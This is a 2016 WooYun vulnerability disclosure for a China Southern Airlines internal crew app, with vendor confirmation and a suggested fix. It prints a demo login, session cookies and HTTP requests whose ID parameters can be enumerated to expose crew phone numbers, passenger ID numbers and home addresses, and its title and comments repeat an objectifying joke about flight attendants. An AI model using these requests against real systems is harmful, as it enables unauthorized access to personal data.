当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0198662

漏洞标题:中国南方航空股份有限公司某内部APP设计缺陷涉及大量敏感信息

相关厂商:中国南方航空股份有限公司

漏洞作者: 高小厨

提交时间:2016-04-20 22:12

修复时间:2016-06-09 09:00

公开时间:2016-06-09 09:00

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-20: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-05-05: 细节向核心白帽子及相关领域专家公开
2016-05-15: 细节向普通白帽子公开
2016-05-25: 细节向实习白帽子公开
2016-06-09: 细节向公众公开

简要描述:

你喜欢的空姐,这里都有

详细说明:

通过https://icrew.csair.com可下载南航内部使用的APP“客舱移动”
获得测试账号:100000,100000*$%
账号来源:

GET /login/DemoUserList.action HTTP/1.1
Host: icrew.csair.com
Accept-Encoding: gzip
User-Agent: 
Connection: keep-alive
Cookie: pass=b1VY%2Bdxzdwc%3D; user=OU2U%2F0PD9HI%3D


1.png


成功进入系统,然后各种越权:
(1)可查看任意航班的空乘人员(手机号在数据包中是没有打码的):

4.png


2.png

2.1.png


GET /mobile/flightScheduled_group.action?groupFlightDate=2016-04-24%2000:30:00.0&groupFlightNo=§5180§&groupDepPort=CAN&empId=182473 HTTP/1.1
Host: icrew.csair.com
Referer: https://icrew.csair.com/mobile/flightScheduled_fast.action?empId=182473
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: JSESSIONID=F955968ADDB987E7C38910DBAC06411A; pass=kY%2BHedsejPRL5OY6EGEgjQ%3D%3D; user=zgrQ%2BnetIDs%3D
Accept-Language: zh-cn
Connection: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B436


(2)可查看飞机以前的故障:

6.png


(3)可查看申请假期的记录

5.png


(4)临时数据(sqllite)中还包括了一些人员的身份证号,还包含了几百名乘客的订单信息,身份证号及家庭住址等

7.png

漏洞证明:

同上

修复方案:

不仅仅验证ID,还要再次验证用户名和密码对应的ID是否匹配

版权声明:转载请注明来源 高小厨@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-25 08:59

厂商回复:

问题找的非常仔细,感谢!

最新状态:

暂无

漏洞评价:

评价

  1. 2016-04-20 22:17 | 从容 ( 普通白帽子 | Rank:414 漏洞数:98 | 哇啦啦啦啦啦 我的宝贝 | Tr3jer@Gmail.c...)

    你喜欢的空姐,这里都有

  2. 2016-04-20 22:22 | Taro ( 普通白帽子 | Rank:335 漏洞数:83 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    空姐是啥?能吃么

  3. 2016-04-20 22:36 | 小挺 ( 实习白帽子 | Rank:45 漏洞数:15 | 在读大三学生,来找工作!)

    你喜欢的空姐,这里都有

  4. 2016-04-20 22:39 | qhwlpg ( 普通白帽子 | Rank:260 漏洞数:64 | http://sec.tuniu.com)

    你喜欢的空姐,这里都有

  5. 2016-04-21 00:05 | 我是壮丁 认证白帽子 ( 实习白帽子 | Rank:42 漏洞数:4 | 专业打酱油)

    你来打卡了啊

  6. 2016-04-21 09:15 | Ton7BrEak ( 普通白帽子 | Rank:318 漏洞数:69 | ☁ 我要继续努力!)

    @我是壮丁 发现sky俩漏洞40rank~流弊~

  7. 2016-04-21 10:29 | tnt1200 ( 普通白帽子 | Rank:134 漏洞数:18 | 关注飞机安全.... @从容 是我师傅)

    你喜欢的空姐,这里都有

  8. 2016-04-21 10:33 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    网传MH370有2块碎片找到了。

  9. 2016-04-21 10:45 | 高小厨 认证白帽子 ( 普通白帽子 | Rank:998 漏洞数:91 | 不会吹牛的小二不是好厨子!)

    我补充了两张图和一个数据包,方便管理员复测使用,@浩天帮忙审核下

  10. 2016-04-21 10:57 | 糖剩七颗 ( 普通白帽子 | Rank:674 漏洞数:90 | 当几个月码农再出来冒泡!)

    @高小厨 还没上核心吗?都蓝v了

  11. 2016-04-25 09:28 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

    你喜欢的空姐,这里都有验证码:QNMB 我也是醉了

  12. 2016-04-25 15:14 | Mark0smith ( 普通白帽子 | Rank:172 漏洞数:70 | 我要是再正常一点就好了)

    666